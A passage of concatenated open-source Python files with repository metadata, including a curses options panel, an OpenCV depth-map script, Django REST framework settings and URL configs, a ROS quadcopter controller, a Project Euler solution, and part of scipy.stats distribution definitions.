self.lastValueWidth = width - indent - 2
def handleKey(self, key):
si = self.selectedIndex
do = self.displayedOptions
if si is None: return None
if key == curses.KEY_UP:
si = (si - 1) % (len(do)+2)
elif key == curses.KEY_DOWN:
si = (si + 1) % (len(do)+2)
elif isSelectionKey(key):
if si == len(do): return OptionResult.BACK # selected back
elif si == len(do)+1: return OptionResult.NEXT # selected next
elif isinstance(do[si], ToggleOption):
do[si].toggle()
i = si + 1
for o in do[si].getSuboptions():
if not o.isEnabled():
for o2 in do:
if o is o2: do.remove(o)
else:
do.insert(i, o)
i += 1
else:
newValue = self.getstr(si + 3, self.lastIndent, do[si].getValue(), curses.A_STANDOUT | getColor(OPTION_COLOR), self.lastValueWidth)
if newValue:
try: do[si].setValue(newValue.strip())
except ValueError, exc:
pass
#cli.popups.showMsg(str(exc), 3)
#cli.controller.getController().redraw()
elif key == 27: si = len(do) # select the back button
self.selectedIndex = si
return None
|
shadow/shadow-ctl
|
src/panel.py
|
Python
|
gpl-3.0
| 41,934 | 0.005032 |
#!/usr/bin/python3
import numpy as np
import cv2
from collections import deque
from obstacle_detector.distance_calculator import spline_dist
from obstacle_detector.perspective import inv_persp_new
from obstacle_detector.perspective import regress_perspecive
from obstacle_detector.depth_mapper import calculate_depth_map
from obstacle_detector.tm.image_shift_calculator import find_shift_value
def video_test(input_video_path=None, output_video_path=None):
cx = 595
cy = 303
roi_width = 25
roi_length = 90
cap = cv2.VideoCapture(
input_video_path \
if input_video_path is not None \
else input('enter video path: '))
old_images = deque()
original_frames = deque()
ret, frame = cap.read()
for i in range(15):
original_frames.append(frame)
img, pts1 = inv_persp_new(
frame, (cx, cy), (roi_width, roi_length), spline_dist, 200)
old_images.append(img)
ret, frame = cap.read()
height, width, _ = frame.shape
out_height, out_width, _ = img.shape
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(
output_video_path \
if output_video_path is not None \
else 'output.avi',
fourcc, 15.0, (out_width * 4, out_height))
left = cv2.imread('aloeL.jpg')
right = cv2.imread('aloeR.jpg')
while(ret):
original_frames.popleft()
ret, frame = cap.read()
original_frames.append(frame)
img, pts1 = inv_persp_new(
frame, (cx, cy), (roi_width, roi_length), spline_dist, 200)
old_images.popleft()
old_images.append(img)
left = original_frames[-5][:, width // 2:]
right = original_frames[-1][:, width // 2:]
left = cv2.pyrDown(left)
left = cv2.blur(left, (3, 3))
right = cv2.pyrDown(right)
right = cv2.blur(right, (3, 3))
depth = calculate_depth_map(left, right)
cv2.imshow('left', left)
cv2.imshow('right', right)
cv2.imshow('depth', depth)
depth = cv2.cvtColor(depth, cv2.COLOR_GRAY2BGR)
res = cv2.addWeighted(left, 0.5, depth, 0.5, 0)
cv2.imshow('res', res)
# left = old_images[-1][300:,:]
# right = old_images[-9][300:,:]
#
# shift_value = find_shift_value(left, right, (30, 100, 60, 300))
# right = np.roll(right, shift_value[1], axis=0)#shift_value[0])
# right = np.roll(right, shift_value[0], axis=1)#shift_value[0])
# left = left[100:-100,:]
# right = right[100:-100,:]
#
# print(shift_value)
#
# left = np.rot90(left, 3)
# right = np.rot90(right, 3)
#
# cv2.imshow('left', left)
# cv2.imshow('right', right)
#
# shifted_map = cv2.equalizeHist(
# calculate_depth_map(
# left, right))
# cv2.imshow(
# 'shifted map', shifted_map)
# diff = cv2.absdiff(left, right)
# cv2.imshow('diff', diff)
# dm = calculate_depth_map(left, right)
# cv2.imshow('dm', dm)
# dm = cv2.equalizeHist(dm)
# cv2.imshow('eq dm', dm)
# dm = cv2.cvtColor(dm, cv2.COLOR_GRAY2BGR)
k = cv2.waitKey(1) & 0xff
if k == 27:
break
elif k == ord('s'):
cv2.imwrite('screen.png', img)
cap.release()
out.release()
cv2.destroyAllWindows()
video_test('../../video/6.mp4', '../results/depth_map_out.avi')
|
Sid1057/obstacle_detector
|
depth_test.py
|
Python
|
mit
| 3,465 | 0.002886 |
"""
Settings for REST framework are all namespaced in the REST_FRAMEWORK setting.
For example your project's `settings.py` file might look like this:
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.YAMLRenderer',
)
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.YAMLParser',
)
}
This module provides the `api_setting` object, that is used to access
REST framework settings, checking for user settings first, then falling
back to the defaults.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.utils import importlib
from rest_framework import ISO_8601
from rest_framework.compat import six
USER_SETTINGS = getattr(settings, 'REST_FRAMEWORK', None)
DEFAULTS = {
# Base API policies
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication'
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.AllowAny',
),
'DEFAULT_THROTTLE_CLASSES': (
),
'DEFAULT_CONTENT_NEGOTIATION_CLASS':
'rest_framework.negotiation.DefaultContentNegotiation',
# Genric view behavior
'DEFAULT_MODEL_SERIALIZER_CLASS':
'rest_framework.serializers.ModelSerializer',
'DEFAULT_PAGINATION_SERIALIZER_CLASS':
'rest_framework.pagination.PaginationSerializer',
'DEFAULT_FILTER_BACKENDS': (),
# Throttling
'DEFAULT_THROTTLE_RATES': {
'user': None,
'anon': None,
},
# Pagination
'PAGINATE_BY': None,
'PAGINATE_BY_PARAM': None,
'MAX_PAGINATE_BY': None,
# Authentication
'UNAUTHENTICATED_USER': 'django.contrib.auth.models.AnonymousUser',
'UNAUTHENTICATED_TOKEN': None,
# View configuration
'VIEW_NAME_FUNCTION': 'rest_framework.views.get_view_name',
'VIEW_DESCRIPTION_FUNCTION': 'rest_framework.views.get_view_description',
# Exception handling
'EXCEPTION_HANDLER': 'rest_framework.views.exception_handler',
# Testing
'TEST_REQUEST_RENDERER_CLASSES': (
'rest_framework.renderers.MultiPartRenderer',
'rest_framework.renderers.JSONRenderer'
),
'TEST_REQUEST_DEFAULT_FORMAT': 'multipart',
# Browser enhancements
'FORM_METHOD_OVERRIDE': '_method',
'FORM_CONTENT_OVERRIDE': '_content',
'FORM_CONTENTTYPE_OVERRIDE': '_content_type',
'URL_ACCEPT_OVERRIDE': 'accept',
'URL_FORMAT_OVERRIDE': 'format',
'FORMAT_SUFFIX_KWARG': 'format',
# Input and output formats
'DATE_INPUT_FORMATS': (
ISO_8601,
),
'DATE_FORMAT': None,
'DATETIME_INPUT_FORMATS': (
ISO_8601,
),
'DATETIME_FORMAT': None,
'TIME_INPUT_FORMATS': (
ISO_8601,
),
'TIME_FORMAT': None,
# Pending deprecation
'FILTER_BACKEND': None,
}
# List of settings that may be in string import notation.
IMPORT_STRINGS = (
'DEFAULT_RENDERER_CLASSES',
'DEFAULT_PARSER_CLASSES',
'DEFAULT_AUTHENTICATION_CLASSES',
'DEFAULT_PERMISSION_CLASSES',
'DEFAULT_THROTTLE_CLASSES',
'DEFAULT_CONTENT_NEGOTIATION_CLASS',
'DEFAULT_MODEL_SERIALIZER_CLASS',
'DEFAULT_PAGINATION_SERIALIZER_CLASS',
'DEFAULT_FILTER_BACKENDS',
'EXCEPTION_HANDLER',
'FILTER_BACKEND',
'TEST_REQUEST_RENDERER_CLASSES',
'UNAUTHENTICATED_USER',
'UNAUTHENTICATED_TOKEN',
'VIEW_NAME_FUNCTION',
'VIEW_DESCRIPTION_FUNCTION'
)
def perform_import(val, setting_name):
"""
If the given setting is a string import notation,
then perform the necessary import or imports.
"""
if isinstance(val, six.string_types):
return import_from_string(val, setting_name)
elif isinstance(val, (list, tuple)):
return [import_from_string(item, setting_name) for item in val]
return val
def import_from_string(val, setting_name):
"""
Attempt to import a class from a string representation.
"""
try:
# Nod to tastypie's use of importlib.
parts = val.split('.')
module_path, class_name = '.'.join(parts[:-1]), parts[-1]
module = importlib.import_module(module_path)
return getattr(module, class_name)
except ImportError as e:
msg = "Could not import '%s' for API setting '%s'. %s: %s." % (val, setting_name, e.__class__.__name__, e)
raise ImportError(msg)
class APISettings(object):
"""
A settings object, that allows API settings to be accessed as properties.
For example:
from rest_framework.settings import api_settings
print api_settings.DEFAULT_RENDERER_CLASSES
Any setting with string import paths will be automatically resolved
and return the class, rather than the string literal.
"""
def __init__(self, user_settings=None, defaults=None, import_strings=None):
self.user_settings = user_settings or {}
self.defaults = defaults or {}
self.import_strings = import_strings or ()
def __getattr__(self, attr):
if attr not in self.defaults.keys():
raise AttributeError("Invalid API setting: '%s'" % attr)
try:
# Check if present in user settings
val = self.user_settings[attr]
except KeyError:
# Fall back to defaults
val = self.defaults[attr]
# Coerce import strings into classes
if val and attr in self.import_strings:
val = perform_import(val, attr)
self.validate_setting(attr, val)
# Cache the result
setattr(self, attr, val)
return val
def validate_setting(self, attr, val):
if attr == 'FILTER_BACKEND' and val is not None:
# Make sure we can initialize the class
val()
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRINGS)
|
DeltaEpsilon-HackFMI2/FMICalendar-REST
|
venv/lib/python2.7/site-packages/rest_framework/settings.py
|
Python
|
mit
| 6,264 | 0.000319 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-14 17:12
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('volunteers', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='volunteer',
old_name='picture',
new_name='avatar',
),
]
|
NewsNerdsAtCoJMC/ProjectTicoTeam6
|
service/volunteers/migrations/0002_auto_20170314_1712.py
|
Python
|
mit
| 424 | 0 |
"""equinox_spring16_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from rest_framework import routers
from equinox_api.views import ApplicationViewSet, OperationViewSet, InstancesViewSet, UserViewSet, ItemViewSet
from equinox_spring16_api import settings
router = routers.DefaultRouter()
router.register(r'applications', ApplicationViewSet)
router.register(r'operations', OperationViewSet)
router.register(r'instances', InstancesViewSet)
router.register(r'items', ItemViewSet)
router.register(r'users', UserViewSet)
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^', include(router.urls)),
url(r'^docs/', include('rest_framework_swagger.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
ivanprjcts/equinox-spring16-API
|
equinox_spring16_api/equinox_spring16_api/urls.py
|
Python
|
lgpl-3.0
| 1,431 | 0.000699 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from privagal.core.utils import PrivagalTestCase
from ...gallery.factories import GalleryFactory, ImageFactory
class GalleryFactoryTestCase(PrivagalTestCase):
def test_images_given(self):
image = ImageFactory()
gallery = GalleryFactory(images__images=[image])
self.timeline.add_child(instance=gallery)
self.assertEqual(gallery.images.first().image, image)
def test_images_default(self):
gallery = GalleryFactory()
self.assertEqual(gallery.images.count(), 3)
|
ychab/privagal
|
privagal/gallery/tests/test_factories.py
|
Python
|
bsd-3-clause
| 584 | 0 |
from sqlalchemy import and_
from DBtransfer import *
from zlib import *
#retrun compressed
def generateFromDB(DBSession, InternData, tmp_name) :
run_list=[]
user_data = DBSession.query(InternData).filter(InternData.timestamp == tmp_name)
for data in user_data :
if not data.run in run_list :
run_list.append(data.run)
return compressList(run_list)
def getknown_runsAndrun_list(DBSession, Mass_specData, InternData, tmp_name) : #CR: rename to splitKnownAndTodo
#~ knownRuns = [] # devide runs from upload into known runs (in DB) ...
#~ runList = [] #...and the usual run_list, to get data from these runs
#CR:
runs_in_upload = decompressList(generateFromDB(DBSession, InternData, tmp_name))
#~ known_runs = [x for x in DBSession.query(Mass_specData.filename).all() if x in runs_in_upload]
known_runs = [x.filename for x in DBSession.query(Mass_specData).filter(Mass_specData.filename.in_(runs_in_upload))]
run_list = [x for x in runs_in_upload if x not in known_runs]
#~ allRuns = getAllRuns_Filename(DBSession, Mass_specData)# in DB saved runs
#~ decomruns_in_upload = decompressList(runs_in_upload)
#~ for run in decomruns_in_upload :
#~ if run in allRuns :
#~ knownRuns.append(run)
#~ else :
#~ runList.append(run)
return (known_runs, run_list)
#input compressed
#output not compressed
def usedRuns(run_list, params) :
list_of_used_runs = []
runs = decompressList(run_list)
for i in range(0, len(runs)) :
if runs[i] in params :
list_of_used_runs.append(runs[i])
return list_of_used_runs
# input not compressed
# output InternData objects
def rowsToFill(DBSession, InternData, tmp_name, used_runs) :
users_rows = getUserRows(DBSession, InternData, tmp_name)
rows = []
for row in users_rows :
if row.run in used_runs :
rows.append(row)
return rows
#input compressed, not compressed
def throughOutUsedRuns(run_list, used_runs) : # not compressed
rl = decompressList(run_list)
for run in used_runs :
rl.pop(rl.index(run))
if len(rl) > 0 :
return compressList(rl)
else :
return []
#
def compressList(list) :
return compress('$$'.join(list))
#input compressed
def decompressList(run_list) :
return decompress(run_list).split('$$')
|
mwalzer/Ligandomat
|
ligandomat/run_list_handling.py
|
Python
|
mit
| 2,262 | 0.07206 |
#!/usr/bin/env python
'''======================================================
Created by: D. Spencer Maughan
Last updated: May 2015
File name: IRIS_DF_Controller.py
Organization: RISC Lab, Utah State University
Notes:
======================================================'''
import roslib; roslib.load_manifest('risc_msgs')
import rospy
from math import *
import numpy as np
import time
#=======================#
# Messages Needed #
#=======================#
from risc_msgs.msg import *
from std_msgs.msg import Bool
from roscopter.msg import Status
#=====================#
# Gain Matrices #
#=====================#
K = np.matrix([[ 1.8, 0, 0, 1.4, 0, 0, 0],\
[ 0, 1.8, 0, 0, 1.4, 0, 0],\
[ 0, 0, 3, 0, 0, 5, 0],\
[ 0, 0, 0, 0, 0, 0,.5]])
#========================#
# Globals #
#========================#
nominal_thrust = 0 # thrust necessary to maintain hover given battery level
phi_scale = 3.053261127645355
phi_trim = 0.0#0.058941904209906
theta_scale = 3.815398742249453
theta_trim = 0.0#-0.091216767651723
ctrl_status = False
states = Cortex()
states.Obj = [States()]*1
traj = Trajectories()
traj.Obj = [Trajectory()]*1
euler_max = 45*np.pi/180
max_yaw_rate = .3490659 #in radians/sec
rate = 45 # Hz
image = 0
start_time = 0
#==================#
# Publishers #
#==================#
pub_ctrl = rospy.Publisher('/controls', Controls, queue_size = 1)
#========================#
# Get Cortex States #
#========================#
def GetStates(S):
global states
states = S
#=====================#
# Get Trajectory #
#=====================#
def GetTraj(S):
global traj
traj = S
#=========================#
# Get Battery Status #
#=========================#
def GetBatt(S):
global nominal_thrust
B = S.battery_remaining
# coefficients for fourth order fit
# determined 11 May 2015 by Spencer Maughan and Ishmaal Erekson
c0 = 0.491674747062374
c1 = -0.024809293286468
c2 = 0.000662710609466
c3 = -0.000008160593348
c4 = 0.000000033699651
nominal_thrust = c0+c1*B+c2*B**2+c3*B**3+c4*B**4
#============================#
# Get Controller Status #
#============================#
def GetStatus(S):
global ctrl_status
ctrl_status = S.data
#========================#
# Basic Controller #
#========================#
def Basic_Controller():
global states, euler_max, max_yaw_rate, pub_ctrl,K,traj
Ctrl = Controls()
Ctrl.Obj = [Control()]*1
Ctrl.header.stamp = states.header.stamp
g = 9.80665 # average value of earth's gravitational constant m/s^2
m = 1.282 # IRIS mass in kg
#===================================#
# Get State Trajectory Errors #
#===================================#
if states.Obj[0].visible:
X = np.asmatrix(np.zeros((7,1)))
X[0] = traj.Obj[0].x-states.Obj[0].x
X[1] = traj.Obj[0].y-states.Obj[0].y
X[2] = traj.Obj[0].z-states.Obj[0].z
X[3] = traj.Obj[0].xdot-states.Obj[0].u
X[4] = traj.Obj[0].ydot-states.Obj[0].v
X[5] = traj.Obj[0].zdot-states.Obj[0].w
X[6] = traj.Obj[0].psi-states.Obj[0].psi*np.pi/180
#============================================#
# Differential Flatness Control Input #
#============================================#
# LQR input
utilde = -K*X
# required input
u_r = np.asmatrix(np.zeros((4,1)))
u = utilde+u_r-np.matrix([[0],[0],[9.81],[0]])
#==================================#
# Rotate to Vehicle 1 Frame #
#==================================#
psi = states.Obj[0].psi*np.pi/180
rotZ = np.matrix([[cos(psi), sin(psi), 0],[-sin(psi), cos(psi), 0],[0, 0, 1]])
Cart = np.matrix([[1, 0, 0],[0, -1, 0],[0, 0, -1]])
u[:-1] = Cart*rotZ*u[:-1]
#===================================#
# Normalize given the Thrust #
#===================================#
T = sqrt(u[0:3].T*u[0:3])
u[:-1] = np.divide(u[:-1],-T)
#==================#
# Set Controls #
#==================#
# Controls for Ardrone
# -phi = right... +phi = left
# -theta = back... +theta = forward
# -psi = right... +psi = left
global phi_trim,theta_trim,phi_scale,theta_scale
phi_d = (asin(u[1,-1]))
theta_d = (-asin(u[0,-1]))
ctrl = Control()
ctrl.name = states.Obj[0].name
ctrl.phi = phi_trim + phi_scale*phi_d
ctrl.theta = theta_trim + theta_scale*theta_d
ctrl.psi = -u[3,-1]/max_yaw_rate
global nominal_thrust
T_d = nominal_thrust+(T-g)/g
ctrl.T = T_d
Ctrl.Obj[0] = ctrl
Ctrl.header = states.header
#rospy.loginfo("latency = %f",states.header.stamp.to_sec()-rospy.get_time())
pub_ctrl.publish(Ctrl)
#===================#
# Main #
#===================#
if __name__=='__main__':
import sys
rospy.init_node('IRIS_DF_Controller')
#=====================================#
# Set up Publish/Subscribe Loop #
#=====================================#
r = rospy.Rate(rate)
while not rospy.is_shutdown():
sub_cortex = rospy.Subscriber('/cortex_raw' , Cortex, GetStates, queue_size=1, buff_size=2**24)
sub_traj = rospy.Subscriber('/trajectory' , Trajectories, GetTraj, queue_size=1, buff_size=2**24)
sub_Batt = rospy.Subscriber('/apm/status' , Status, GetBatt)
sub_status = rospy.Subscriber('/controller_status' , Bool, GetStatus)
Basic_Controller()
r.sleep()
|
riscmaster/risc_maap
|
risc_control/src/IRIS_DF_Controller.py
|
Python
|
bsd-2-clause
| 6,110 | 0.022913 |
#!/usr/bin/env python
# coding=utf-8
# Python Script
#
# Copyleft © Manoel Vilela
#
#
from functools import reduce
"""
Digit fifth powers
Problem 30
Surprisingly there are only three numbers that can be written as the sum of fourth powers of their digits:
1634 = 1^4 + 6^4 + 3^4 + 4^4
8208 = 8^4 + 2^4 + 0^4 + 8^4
9474 = 9^4 + 4^4 + 7^4 + 4^4
As 1 = 14 is not a sum it is not included.
The sum of these numbers is 1634 + 8208 + 9474 = 19316.
Find the sum of all the numbers that can be written as the sum of fifth powers of their digits.
"""
""" Prova de um cara lá no fórum do PE sobre apenas ser necessário considerar números de 6 dígitos ou menos.
Proof that one need only consider numbers 6 digits or less:
If N has n digits, then 10^{n-1} <= N.
If N is the sum of the 5th powers of its digits, N <= n*9^5. Thus, 10^{n-1} <= n*9^5.
We now show by induction that if n>=7, then 10^{n-6} > n.
1) Basis step (n=7): 10^{7-6} = 10 > 7.
2) Induction step: suppose 10^{n-6} > n for some n>=7. Show this true for n+1 too. Well,
10^{(n+1)-6} = 10*10^{n-6} > 10n > 2n > n+1
QED.
It follows that if n>=7, then
10^{n-1} = 10^{n-6}*10^5 > n * 10^5 > n*9^5.
Hence the only way we can have 10^{n-1} <= n*9^5 is for n<=6.
"""
# Aqui foi pura sorte.
# Inicialmente tentei pensar num limite para testes, seria o tamanho*9**5, mas não consegui deduzir o maior tamanho possível
# Desse jeito, fiz alguns testes e descobri que a ocorrência de números que poderiam ser escritos como a soma de potência(5)
# Era no tamanho intervalo de [4, 7)
from itertools import combinations_with_replacement as c; from string import digits as d
n = lambda num, digits: sorted(str(num)) == sorted(digits)
p = lambda comb: sum([int(n) ** 5 for n in comb])
print(sum(set(reduce(list.__add__, ([p(cb) for cb in c(d, x) if n(p(cb), cb)] for x in range(7))))))
|
DestructHub/ProjectEuler
|
Problem030/Python/solution_1.py
|
Python
|
mit
| 1,884 | 0.010144 |
# -*- coding: utf-8 -*-
#
# Author: Travis Oliphant 2002-2011 with contributions from
# SciPy Developers 2004-2011
#
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from scipy._lib.doccer import (extend_notes_in_docstring,
replace_notes_in_docstring)
from scipy import optimize
from scipy import integrate
from scipy import interpolate
import scipy.special as sc
import scipy.special._ufuncs as scu
from scipy._lib._numpy_compat import broadcast_to
from scipy._lib._util import _lazyselect, _lazywhere
from . import _stats
from ._tukeylambda_stats import (tukeylambda_variance as _tlvar,
tukeylambda_kurtosis as _tlkurt)
from ._distn_infrastructure import (get_distribution_names, _kurtosis,
_ncx2_cdf, _ncx2_log_pdf, _ncx2_pdf,
rv_continuous, _skew, valarray,
_get_fixed_fit_value)
from ._constants import _XMIN, _EULER, _ZETA3, _XMAX, _LOGXMAX
# In numpy 1.12 and above, np.power refuses to raise integers to negative
# powers, and `np.float_power` is a new replacement.
try:
float_power = np.float_power
except AttributeError:
float_power = np.power
def _remove_optimizer_parameters(kwds):
"""
Remove the optimizer-related keyword arguments 'loc', 'scale' and
'optimizer' from `kwds`. Then check that `kwds` is empty, and
raise `TypeError("Unknown arguments: %s." % kwds)` if it is not.
This function is used in the fit method of distributions that override
the default method and do not use the default optimization code.
`kwds` is modified in-place.
"""
kwds.pop('loc', None)
kwds.pop('scale', None)
kwds.pop('optimizer', None)
if kwds:
raise TypeError("Unknown arguments: %s." % kwds)
## Kolmogorov-Smirnov one-sided and two-sided test statistics
class ksone_gen(rv_continuous):
r"""General Kolmogorov-Smirnov one-sided test.
This is the distribution of the one-sided Kolmogorov-Smirnov (KS)
statistics :math:`D_n^+` and :math:`D_n^-`
for a finite sample size ``n`` (the shape parameter).
%(before_notes)s
Notes
-----
:math:`D_n^+` and :math:`D_n^-` are given by
.. math::
D_n^+ &= \text{sup}_x (F_n(x) - F(x)),\\
D_n^- &= \text{sup}_x (F(x) - F_n(x)),\\
where :math:`F` is a CDF and :math:`F_n` is an empirical CDF. `ksone`
describes the distribution under the null hypothesis of the KS test
that the empirical CDF corresponds to :math:`n` i.i.d. random variates
with CDF :math:`F`.
%(after_notes)s
See Also
--------
kstwobign, kstest
References
----------
.. [1] Birnbaum, Z. W. and Tingey, F.H. "One-sided confidence contours
for probability distribution functions", The Annals of Mathematical
Statistics, 22(4), pp 592-596 (1951).
%(example)s
"""
def _pdf(self, x, n):
return -scu._smirnovp(n, x)
def _cdf(self, x, n):
return scu._smirnovc(n, x)
def _sf(self, x, n):
return sc.smirnov(n, x)
def _ppf(self, q, n):
return scu._smirnovci(n, q)
def _isf(self, q, n):
return sc.smirnovi(n, q)
ksone = ksone_gen(a=0.0, b=1.0, name='ksone')
class kstwobign_gen(rv_continuous):
r"""Kolmogorov-Smirnov two-sided test for large N.
This is the asymptotic distribution of the two-sided Kolmogorov-Smirnov
statistic :math:`\sqrt{n} D_n` that measures the maximum absolute
distance of the theoretical CDF from the empirical CDF (see `kstest`).
%(before_notes)s
Notes
-----
:math:`\sqrt{n} D_n` is given by
.. math::
D_n = \text{sup}_x |F_n(x) - F(x)|
where :math:`F` is a CDF and :math:`F_n` is an empirical CDF. `kstwobign`
describes the asymptotic distribution (i.e. the limit of
:math:`\sqrt{n} D_n`) under the null hypothesis of the KS test that the
empirical CDF corresponds to i.i.d. random variates with CDF :math:`F`.
%(after_notes)s
See Also
--------
ksone, kstest
References
----------
.. [1] Marsaglia, G. et al. "Evaluating Kolmogorov's distribution",
Journal of Statistical Software, 8(18), 2003.
%(example)s
"""
def _pdf(self, x):
return -scu._kolmogp(x)
def _cdf(self, x):
return scu._kolmogc(x)
def _sf(self, x):
return sc.kolmogorov(x)
def _ppf(self, q):
return scu._kolmogci(q)
def _isf(self, q):
return sc.kolmogi(q)
kstwobign = kstwobign_gen(a=0.0, name='kstwobign')
## Normal distribution
# loc = mu, scale = std
# Keep these implementations out of the class definition so they can be reused
# by other distributions.
_norm_pdf_C = np.sqrt(2*np.pi)
_norm_pdf_logC = np.log(_norm_pdf_C)
def _norm_pdf(x):
return np.exp(-x**2/2.0) / _norm_pdf_C
def _norm_logpdf(x):
return -x**2 / 2.0 - _norm_pdf_logC
def _norm_cdf(x):
return sc.ndtr(x)
def _norm_logcdf(x):
return sc.log_ndtr(x)
def _norm_ppf(q):
return sc.ndtri(q)
def _norm_sf(x):
return _norm_cdf(-x)
def _norm_logsf(x):
return _norm_logcdf(-x)
def _norm_isf(q):
return -_norm_ppf(q)
class norm_gen(rv_continuous):
r"""A normal continuous random variable.
The location (``loc``) keyword specifies the mean.
The scale (``scale``) keyword specifies the standard deviation.
%(before_notes)s
Notes
-----
The probability density function for `norm` is:
.. math::
f(x) = \frac{\exp(-x^2/2)}{\sqrt{2\pi}}
for a real number :math:`x`.
%(after_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.standard_normal(self._size)
def _pdf(self, x):
# norm.pdf(x) = exp(-x**2/2)/sqrt(2*pi)
return _norm_pdf(x)
def _logpdf(self, x):
return _norm_logpdf(x)
def _cdf(self, x):
return _norm_cdf(x)
def _logcdf(self, x):
return _norm_logcdf(x)
def _sf(self, x):
return _norm_sf(x)
def _logsf(self, x):
return _norm_logsf(x)
def _ppf(self, q):
return _norm_ppf(q)
def _isf(self, q):
return _norm_isf(q)
def _stats(self):
return 0.0, 1.0, 0.0, 0.0
def _entropy(self):
return 0.5*(np.log(2*np.pi)+1)
@replace_notes_in_docstring(rv_continuous, notes="""\
This function uses explicit formulas for the maximum likelihood
estimation of the normal distribution parameters, so the
`optimizer` argument is ignored.\n\n""")
def fit(self, data, **kwds):
floc = kwds.pop('floc', None)
fscale = kwds.pop('fscale', None)
_remove_optimizer_parameters(kwds)
if floc is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
# Without this check, this function would just return the
# parameters that were given.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
if floc is None:
loc = data.mean()
else:
loc = floc
if fscale is None:
scale = np.sqrt(((data - loc)**2).mean())
else:
scale = fscale
return loc, scale
norm = norm_gen(name='norm')
class alpha_gen(rv_continuous):
r"""An alpha continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `alpha` ([1]_, [2]_) is:
.. math::
f(x, a) = \frac{1}{x^2 \Phi(a) \sqrt{2\pi}} *
\exp(-\frac{1}{2} (a-1/x)^2)
where :math:`\Phi` is the normal CDF, :math:`x > 0`, and :math:`a > 0`.
`alpha` takes ``a`` as a shape parameter.
%(after_notes)s
References
----------
.. [1] Johnson, Kotz, and Balakrishnan, "Continuous Univariate
Distributions, Volume 1", Second Edition, John Wiley and Sons,
p. 173 (1994).
.. [2] Anthony A. Salvia, "Reliability applications of the Alpha
Distribution", IEEE Transactions on Reliability, Vol. R-34,
No. 3, pp. 251-252 (1985).
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x, a):
# alpha.pdf(x, a) = 1/(x**2*Phi(a)*sqrt(2*pi)) * exp(-1/2 * (a-1/x)**2)
return 1.0/(x**2)/_norm_cdf(a)*_norm_pdf(a-1.0/x)
def _logpdf(self, x, a):
return -2*np.log(x) + _norm_logpdf(a-1.0/x) - np.log(_norm_cdf(a))
def _cdf(self, x, a):
return _norm_cdf(a-1.0/x) / _norm_cdf(a)
def _ppf(self, q, a):
return 1.0/np.asarray(a-sc.ndtri(q*_norm_cdf(a)))
def _stats(self, a):
return [np.inf]*2 + [np.nan]*2
alpha = alpha_gen(a=0.0, name='alpha')
class anglit_gen(rv_continuous):
r"""An anglit continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `anglit` is:
.. math::
f(x) = \sin(2x + \pi/2) = \cos(2x)
for :math:`-\pi/4 \le x \le \pi/4`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# anglit.pdf(x) = sin(2*x + \pi/2) = cos(2*x)
return np.cos(2*x)
def _cdf(self, x):
return np.sin(x+np.pi/4)**2.0
def _ppf(self, q):
return np.arcsin(np.sqrt(q))-np.pi/4
def _stats(self):
return 0.0, np.pi*np.pi/16-0.5, 0.0, -2*(np.pi**4 - 96)/(np.pi*np.pi-8)**2
def _entropy(self):
return 1-np.log(2)
anglit = anglit_gen(a=-np.pi/4, b=np.pi/4, name='anglit')
class arcsine_gen(rv_continuous):
r"""An arcsine continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `arcsine` is:
.. math::
f(x) = \frac{1}{\pi \sqrt{x (1-x)}}
for :math:`0 < x < 1`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# arcsine.pdf(x) = 1/(pi*sqrt(x*(1-x)))
return 1.0/np.pi/np.sqrt(x*(1-x))
def _cdf(self, x):
return 2.0/np.pi*np.arcsin(np.sqrt(x))
def _ppf(self, q):
return np.sin(np.pi/2.0*q)**2.0
def _stats(self):
mu = 0.5
mu2 = 1.0/8
g1 = 0
g2 = -3.0/2.0
return mu, mu2, g1, g2
def _entropy(self):
return -0.24156447527049044468
arcsine = arcsine_gen(a=0.0, b=1.0, name='arcsine')
class FitDataError(ValueError):
# This exception is raised by, for example, beta_gen.fit when both floc
# and fscale are fixed and there are values in the data not in the open
# interval (floc, floc+fscale).
def __init__(self, distr, lower, upper):
self.args = (
"Invalid values in `data`. Maximum likelihood "
"estimation with {distr!r} requires that {lower!r} < x "
"< {upper!r} for each x in `data`.".format(
distr=distr, lower=lower, upper=upper),
)
class FitSolverError(RuntimeError):
